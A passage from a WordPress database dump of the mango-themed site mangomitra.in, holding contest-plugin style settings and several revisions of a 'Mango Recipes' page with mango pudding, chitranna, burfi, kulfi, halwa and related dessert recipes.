0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\",\"enabled\":true}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"\"}}}','A','','publish','closed','closed','','787','','','2022-02-09 13:09:25','2022-02-09 07:39:25','',0,'https://mangomitra.in/?post_type=contest&#038;p=787',0,'contest','',0),(788,1,'2022-02-07 12:49:46','2022-02-07 07:19:46','','','','inherit','closed','closed','','787-autosave-v1','','','2022-02-07 12:49:46','2022-02-07 07:19:46','',787,'https://mangomitra.in/?p=788',0,'revision','',0),(791,1,'2022-02-07 13:41:50','2022-02-07 08:11:50','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"><strong>mango pudding recipe | mango pudding dessert | mango panna cotta<br>easy mango pudding recipe | mango pudding dessert | mango panna cotta<br>CourseDessert</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>CuisineItalian               Author: HEBBARS KITCHEN</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time : 4 hours</li><li>Cooking Time      :15 minutes</li><li>Total Time            : 4 hours 15 minutes</li><li>Servings               : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Ingredients for mango layer</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Instructions</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon of hot water.</li><li>Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk. Add in 1 tsp agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil). Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tsp vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass. Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph -->\n<p><strong>Mavinakayi Chitranna Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p><strong>Mango Rasayana</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p><strong>Mango Seekarna</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve Mango Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes. You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 13:41:50','2022-02-07 08:11:50','',745,'https://mangomitra.in/?p=791',0,'revision','',0),(793,1,'2022-02-07 15:31:53','2022-02-07 10:01:53','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango pudding recipe | mango pudding dessert | mango panna cotta<br>easy mango pudding recipe | mango pudding dessert | mango panna cotta<br>CourseDessert</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>CuisineItalian    Author: HEBBARS KITCHEN </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients for mango layer</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mavinakayi Chitranna Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Rasayana</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Seekarna</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango burfi recipe | mango barfi | mango coconut burfi recipe<br>easy mango burfi recipe | mango barfi | mango coconut burfi recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Coursesweet       Cuisinesouth Indian      Author: HEBBARS KITCHEN</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Kulfi Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Halwa Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces<br></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 15:31:53','2022-02-07 10:01:53','',745,'https://mangomitra.in/?p=793',0,'revision','',0),(794,1,'2022-02-07 15:34:05','2022-02-07 10:04:05','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango pudding recipe | mango pudding dessert | mango panna cotta<br>easy mango pudding recipe | mango pudding dessert | mango panna cotta<br>CourseDessert</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>CuisineItalian                                           Author: HEBBARS KITCHEN </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients for mango layer</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mavinakayi Chitranna Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Rasayana</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Seekarna</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango burfi recipe | mango barfi | mango coconut burfi recipe<br>easy mango burfi recipe | mango barfi | mango coconut burfi recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Coursesweet                            Cuisinesouth Indian                         Author: HEBBARS KITCHEN</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Kulfi Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with 